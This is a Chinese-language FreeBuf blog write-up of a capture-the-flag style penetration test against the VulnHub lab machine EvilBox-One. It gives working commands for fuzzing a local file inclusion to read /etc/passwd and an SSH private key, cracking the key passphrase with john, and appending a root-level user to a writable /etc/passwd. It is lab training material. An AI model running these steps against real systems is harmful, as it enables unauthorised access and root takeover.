freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

EvilBox-One靶机渗透
2022-06-05 12:29:33
所属地 北京

1.靶机介绍

靶机地址下载:https://www.vulnhub.com/entry/evilbox-one,736/
靶机提示:
Description
Difficulty: Easy
This works better with VirtualBox rather than VMware。
靶机IP:10.8.1.119

2.端口发现

扫描靶机信息,发现开放了22、25、80、110端口。
图片.png

3.目录扫描

目录扫描
图片.png查看/robots.txt得到提示Hello和H4x0r,一番尝试没有任何可利用。
图片.png
访问/secret是空白页面,没有其他可以利用的了,那就只能再扫描下这个目录了.
图片.png尝试扫描下/secret目录,换了3个工具,利用gobuster终于扫出来一个evil.php。
图片.png
图片.png

4.wfuzz参数爆破

访问evil.php,依然是个空白也么,那应该有参数。
图片.png利用wfuzz爆破一下参数,尝试下文件包含,查看下/etc/passwd,
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 0 http://10.8.1.119/secret/evil.php?FUZZ=../../../../../../../../etc/passwd得到参数command
图片.png利用正确的参数command查看下/etc/passwd,发现了用户mowree。
图片.png

5.ssh私钥破解登录

查看下mowree用户的私钥,居然成功了。
图片.png将私钥保存到id_rsa,赋权600(权限太高无法执行),利用ssh2john id_rsa > pass.txt编译私钥保存,利用john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt破解出密码unicorn。
图片.png图片.png图片.png图片.png指定id_rsa登录ssh,输入密码unicorn得到mowree的shell。
图片.png查看当前目录下的user.txt,得到flag。
图片.png

6.提权

一番查找之后没有任何线索,而之前的Hello和H4x0r也没有任何可利用的,突然灵光一闪,看下/etc/passwd的权限吧,之前就遇到过可写入的情况,果然,哈哈。
图片.pngperl -le 'print crypt("test","test")'先生成加盐的密码teH0wLIpW0gyQ。
图片.pngecho toor:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash >>/etc/passwd,写入具有root权限的用户toor密码为test。查看/etc/passwd,成功写入
图片.png切换用户,得到root权限,拿到flag:36QtXfdJWvdC0VavlPIApUbDlqTsBM!
图片.png

7.总结

打过很多靶机都会遇到/etc/passwd具有写入权限,拿到用户shell的时候,建议可以先执行sudo -l、查看.bash_history、查看/etc/passwd权限、查看系统版本信息、查看隐藏文件等等。

# 渗透测试 # 网络安全 # web安全 # 系统安全 # 漏洞分析
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录